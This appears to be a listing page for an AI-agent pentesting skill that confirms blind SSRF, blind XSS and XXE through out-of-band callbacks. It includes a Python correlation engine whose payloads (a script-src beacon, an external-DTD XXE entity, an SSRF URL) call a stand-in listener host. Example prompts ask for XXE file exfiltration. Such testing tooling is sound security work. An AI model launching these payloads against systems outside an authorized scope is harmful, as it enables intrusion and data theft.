Our take
Security testing skill for validating outbound interactions and out-of-band (OOB) callbacks, such as SSRF callbacks, blind XSS beacons, or DNS interactions.
Strengths
- Generates a unique correlation identifier per test to avoid false positives.
- Deterministic validation of asynchronous interactions, with timestamp and source context.
- Supports multiple vectors: SSRF, blind XSS, OOB XXE, webhooks.
Limitations
- Requires an external listener that is set up and reachable from the target.
- Can be affected by ambient network noise if correlation is not rigorous.
- Not suitable for fully in-band vulnerabilities that need no callback.
Use this skill when you need to prove an asynchronous server-side interaction through an external callback (blind SSRF, blind XSS, OOB XXE).
Do not use it for fully in-band exploits (direct response) or for static code review with no network interaction.
Security analysis
Safe. The skill describes a methodology for outbound interaction correlation in pentesting without providing any executable commands or dangerous actions. It is purely analytical and poses no direct execution risk.
No issues detected
Examples
- I need to test a potential SSRF vulnerability in a web application that fetches user-provided URLs. Generate unique callback tokens and send a request to my OOB listener. Confirm if a callback is received and correlate it with the payload.
- I suspect a blind XSS in a feedback form. Create a payload with a unique identifier that will cause the browser to make a request to my callback server. Monitor for any incoming requests and confirm the XSS if a callback with the correct token arrives.
- Test an XML parser for XXE vulnerabilities using OOB techniques. Craft an XML payload that triggers an outbound HTTP request to my listener, exfiltrating a known file content. Validate the callback and extract the data.

name: pentest-outbound-interaction-oob-detection
description: "Security assessment skill for outbound interaction and out-of-band (OOB) validation. Use when prompts include SSRF callback confirmation, blind XSS beacons, webhook abuse, XXE/OOB behavior, DNS/HTTP callback correlation, or asynchronous server-side interaction proof. Do not use when vulnerabilities are fully in-band and require no external callback correlation."
Outbound Interaction & OOB Detection
Activation Triggers (Positive)
- ssrf callback
- blind xss
- webhook abuse
- oob
- dns interaction
- asynchronous callback
- xxe out of band
Exclusion Triggers (Negative)
- fully in-band exploit
- static code review only
- report drafting only
Output Schema
- Callback correlation table: token, payload path, timestamp, source context
- Validation verdict: confirmed, not confirmed, inconclusive
- Follow-on exploitation opportunities from confirmed outbound behavior
Instructions
- Generate unique per-test correlation identifiers before sending payloads.
- Ensure callback listener scope and retention are sufficient for delayed events.
- Correlate callbacks by token, path, and time window before confirmation.
- Differentiate noisy background traffic from test-linked interactions.
- Use control payloads to reduce false positives.
- Pass confirmed primitives to exploit or logic skills with full correlation evidence.
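The instructions above (unique per-test tokens, retention long enough for delayed events, correlation by token, path and time window, noise separation, positive and negative controls) and the output schema form one procedure. The following is an added worked example, not code from this skill or its author: a small correlation engine that mints tokens, embeds them in the SSRF, blind XSS and XXE payloads from the examples section, then matches a listener log against the probes and emits the correlation table with a verdict per probe. The listener host `oob.example.test`, the log line format, the time windows, and all IP addresses and log lines are constructed assumptions.

```python
"""Out-of-band (OOB) callback correlation: per-test tokens, time windows, controls."""
import hashlib
import re
import secrets
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

LISTENER = "oob.example.test"  # assumption: hypothetical callback listener host
T0 = datetime(2024, 5, 1, 10, 0, tzinfo=timezone.utc)  # constructed reference time

# Correlation window per vector (assumed values). SSRF/XXE fire server-side at parse
# time; blind XSS fires only when someone later opens the page, so retention must be long.
WINDOWS = {
    "ssrf": timedelta(minutes=10),
    "xxe": timedelta(minutes=10),
    "blind-xss": timedelta(days=30),
    "control-pos": timedelta(minutes=10),
    "control-neg": timedelta(days=30),
}


@dataclass(frozen=True)
class Probe:
    token: str        # unique per test, never reused across unrelated tests
    vector: str
    path: str         # listener path the payload should hit
    sent_at: datetime
    payload: str


def build_probe(vector: str, sent_at: datetime) -> Probe:
    """Mint a fresh token and embed it in the payload for the given vector."""
    token = secrets.token_hex(8)
    path = f"/{vector}/{token}"
    url = f"http://{LISTENER}{path}"
    payloads = {
        "ssrf": url,                                              # URL handed to the fetcher
        "blind-xss": f'"><script src="{url}.js"></script>',       # beacon stored for a later viewer
        "xxe": f'<!DOCTYPE x [<!ENTITY % p SYSTEM "{url}.dtd"> %p;]><x/>',  # external DTD fetch
        "control-pos": url,  # operator fetches this themselves to prove the listener is alive
        "control-neg": url,  # never sent anywhere; a hit means noise or token leakage
    }
    return Probe(token, vector, path, sent_at, payloads[vector])


# Constructed listener log format: "<iso timestamp> <source ip> <method> <path>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+)$")


def parse_log_line(line: str):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "method": m["method"], "path": m["path"]}


def log_digest(log_lines) -> str:
    """Digest of the raw listener log, stored with the table so the evidence is tamper-evident."""
    return hashlib.sha256("\n".join(log_lines).encode()).hexdigest()


def correlate(probes, log_lines):
    """Correlation table rows: vector, token, payload path, timestamp, source context, verdict."""
    events = [e for e in map(parse_log_line, log_lines) if e]
    rows = []
    for p in probes:
        linked = [e for e in events if p.token in e["path"]]   # token match only
        in_window = [e for e in linked if p.sent_at <= e["ts"] <= p.sent_at + WINDOWS[p.vector]]
        if in_window:
            verdict, first = "confirmed", in_window[0]
        elif linked:
            verdict, first = "inconclusive", linked[0]   # token seen, but outside the window
        else:
            verdict, first = "not confirmed", None
        rows.append({"vector": p.vector, "token": p.token, "path": p.path,
                     "timestamp": first["ts"].isoformat() if first else None,
                     "source": f'{first["src"]} {first["method"]}' if first else None,
                     "verdict": verdict})
    # Controls gate the run (one control of each kind per run assumed): a dead listener
    # turns every "not confirmed" into "inconclusive"; a leaking token invalidates everything.
    control = {r["vector"]: r["verdict"] for r in rows}
    if control.get("control-pos") != "confirmed":
        for r in rows:
            if r["verdict"] == "not confirmed":
                r["verdict"] = "inconclusive"
    if control.get("control-neg") == "confirmed":
        for r in rows:
            r["verdict"] = "inconclusive"
    return rows


def demo():
    """Constructed run: five probes and a constructed listener log (not real traffic)."""
    probes = [build_probe(v, T0) for v in ("ssrf", "blind-xss", "xxe", "control-pos", "control-neg")]
    path = {p.vector: p.path for p in probes}
    at = lambda d: (T0 + d).isoformat()
    log = [
        f"{at(timedelta(seconds=-40))} 198.51.100.9 GET /",                   # background scanner noise
        f"{at(timedelta(seconds=2))} 198.51.100.20 GET {path['control-pos']}", # operator's own fetch
        f"{at(timedelta(seconds=5))} 203.0.113.7 GET {path['ssrf']}",         # target fetched our URL
        f"{at(timedelta(hours=3))} 203.0.113.7 GET {path['xxe']}.dtd",        # late: outside the window
        f"{at(timedelta(days=2))} 192.0.2.44 GET {path['blind-xss']}.js",     # a viewer opened the page
        "not a log line",
    ]
    return correlate(probes, log)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

In the constructed run the SSRF and blind XSS probes come back confirmed, the XXE probe is inconclusive because its token was seen three hours after dispatch (outside the assumed ten-minute window, so it may be a replay or a queued job rather than the parser), and the negative control stays not confirmed, which is what shows the confirmed rows are not noise. The digest of the raw log belongs next to the table in the report.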
Should Do
- Treat OOB validation as evidence discipline, not only payload dispatch.
- Preserve immutable callback logs for auditability.
- Include both positive and negative control outcomes.
Should Not Do
- Do not claim confirmation without deterministic correlation.
- Do not reuse tokens across unrelated tests.
- Do not expose real secrets in callback payloads.
Security Auditor
Security
Analyzes code to detect OWASP Top 10 vulnerabilities.
OWASP Security Checklist
Security
Generates application security checklists based on the OWASP Top 10.
Threat Modeling
Security
Generates threat modeling documents with STRIDE analysis.